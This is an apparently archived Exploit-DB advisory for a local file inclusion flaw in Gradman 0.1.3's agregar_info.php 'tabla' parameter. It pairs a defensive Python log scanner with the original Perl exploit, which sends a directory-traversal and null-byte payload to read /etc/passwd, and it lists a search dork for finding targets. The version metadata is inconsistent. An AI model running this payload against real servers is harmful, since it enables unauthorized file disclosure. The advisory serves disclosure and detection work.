Vendor: Gradman
By: JosS
CVSS: 7.5 HIGH
Local File Inclusion
CWE: 98
Product Name: Gradman
Affected Version From: 2000.1.3
Affected Version To: 2000.1.3
Patch Exists: YES
CPE: a:gradman:gradman
2008

Gradman <= 0.1.3 (agregar_info.php?tabla=) Local File Inclusion Exploit

Gradman is vulnerable to local file inclusion. The flaw is caused by improper validation of user-supplied input in the 'tabla' parameter of the 'agregar_info.php' script. An attacker can exploit it to include arbitrary local files from the web server and execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
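
A log check for the flaw described above, added here as an example and not part of the original advisory or of Gradman: it scans web-server access logs for requests to agregar_info.php whose decoded 'tabla' value carries a dot-dot sequence, a path separator or a null byte. The log lines are constructed, and the rule that a legitimate 'tabla' value is a plain identifier is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation IP range), not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jan/2008:10:01:02 +0000] "GET /gradman/agregar_info.php?tabla=alumnos HTTP/1.1" 200 812
203.0.113.9 - - [16/Jan/2008:10:02:10 +0000] "GET /gradman/agregar_info.php?tabla=../../../../etc/passwd%00 HTTP/1.1" 200 1540
203.0.113.9 - - [16/Jan/2008:10:02:11 +0000] "GET /gradman/agregar_info.php?tabla=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1540
203.0.113.4 - - [16/Jan/2008:10:03:00 +0000] "GET /gradman/index.php?tabla=../x HTTP/1.1" 404 0
"""
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SAFE_TABLA = re.compile(r'^[A-Za-z0-9_]+$')  # assumed shape of a legitimate table name

def suspicious_tabla(value):
    """Return the reasons a percent-decoded 'tabla' value looks like path traversal."""
    reasons = []
    if "\x00" in value:
        reasons.append("null byte")
    if ".." in value:
        reasons.append("dot-dot sequence")
    if "/" in value or "\\" in value:
        reasons.append("path separator")
    if not reasons and not SAFE_TABLA.match(value):
        reasons.append("unexpected characters")
    return reasons

def scan(log_text):
    """Return (client, status, tabla, reasons) for flagged agregar_info.php requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/agregar_info.php"):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "tabla":
                reasons = suspicious_tabla(value)
                if reasons:
                    hits.append((client, int(status), value, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Flagged requests that returned status 200 are the ones to triage first, since a 404 or 403 suggests the include did not succeed.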

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+     Gradman <= 0.1.3  (agregar_info.php?tabla=) Local File Inclusion Exploit       +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Gradman <= 0.1.3
[~] HomePage: http://gradman.xe1ido.com.mx/
[~] Exploit: Local File Inclusion [High]
[~] Where: agregar_info.php?tabla=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "powered by Gradman"
[~] Dork2: Priv8, xD!


[+] Exploit:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "\t\t########################################################\n\n";
print "\t\t#    Gradman <= 0.1.3 - Local File Inclusion Exploit   #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";


if (!$ARGV[0])
{
print "Usage: perl xpl.pl [HOST]\n";
print "Example: perl xpl.pl http://localhost/gradman/\n";
}

else
{

$web=$ARGV[0];
chomp $web;

$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";

my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}

}


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-01-16]